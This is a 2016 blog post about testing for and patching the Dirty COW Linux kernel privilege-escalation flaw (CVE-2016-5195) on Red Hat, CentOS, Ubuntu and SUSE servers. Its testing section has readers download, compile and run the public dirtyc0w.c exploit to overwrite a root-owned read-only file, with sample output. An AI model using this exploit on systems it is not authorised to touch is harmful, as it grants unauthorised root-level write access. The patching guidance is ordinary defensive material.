welcome to netwrkspider

Friday, October 21, 2016

How to patch COW vulnerablities on REDHAT/CENTOS 4.x/5.x/6.x/7.x & UBUNTU Servers.

A race condition was found in the way the Linux kernel's memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. An unprivileged local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system.

Find out more about CVE-2016-5195 from the MITRE CVE dictionary dictionary and NIST NVD.

How to Test  the vulnerabilities.

A ) For Redhat/Centos Based machine.

wget https://access.redhat.com/sites/default/files/rh-cve-2016-5195_1.sh

Execute the Shell Script to to testing.

bash rh-cve-2016-5195_1.sh

B ) For All Other Linux Distro.

Download the Code:
$ wget https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c

Run it as follows. First be root:
$ sudo -s
# echo this is not a test > foo

Run it as normal user:
$ gcc -lpthread dirtyc0w.c -o dirtyc0w
$ ./dirtyc0w foo m00000000000000000
mmap 56123000
madvise 0
procselfmem 1800000000
$ cat foo

How to Patch The cow vulnerabilities?


Ubuntu users "Dirty COW" recommended Kernels.

Canonical urged all users to patch their systems immediately by installing:

    linux-image-4.8.0-26 (4.8.0-26.28) for Ubuntu 16.10
    linux-image-4.4.0-45 (4.4.0-45.66) for Ubuntu 16.04 LTS
    linux-image-3.13.0-100 (3.13.0-100.147) for Ubuntu 14.04 LTS
    linux-image-3.2.0-113 (3.2.0-113.155) for Ubuntu 12.04 LTS
    linux-image-4.4.0-1029-raspi2 (4.4.0-1029.36)

The Xenial HWE kernel for Ubuntu 14.04 LTS was updated as well, to version linux-image-4.4.0-45 (4.4.0-45.66~14.04.1), and the Trusty HWE kernel for Ubuntu 12.04 LTS to version linux-image-3.13.0-100 (3.13.0-100.147~precise1).

After logging in, you can check for and apply new updates with:

$ sudo apt-get update && sudo apt-get upgrade && sudo apt-get dist-upgrade

Restart the Server and verify the kernel version.

Note : When performing an update, first review what apt is going to do, then confirm that you want to apply the updates (this is particularly true when running the development release).

If you would prefer to have updates applied automatically, make sure the unattended-upgrades package is installed, then run 'sudo dpkg-reconfigure unattended-upgrades'. Please note that updates may restart services on your server, so this may not be appropriate for all environments.

B) REDHAT/CENTOS 5.x/6.x/7.x

Platform                                    Package                    State
Red Hat Enterprise MRG 2     realtime-kernel        Affected
Red Hat Enterprise Linux 7     kernel-rt                  Affected
Red Hat Enterprise Linux 7     kernel                      Affected
Red Hat Enterprise Linux 6     kernel                      Affected
Red Hat Enterprise Linux 5     kernel                      Affected

[root@instance-1 ~]# yum update

Reboot the Server.

[root@instance-1 ~]# reboot

verify the kernel.


[root@linux4 ~]# up2date -u
[root@linux4 ~]# reboot

C) Opensuse Linux/Suse Enterprise Linux

To apply all needed patches to the system type below commands:

# zypper patch

# reboot

Verify the kernel.

No comments: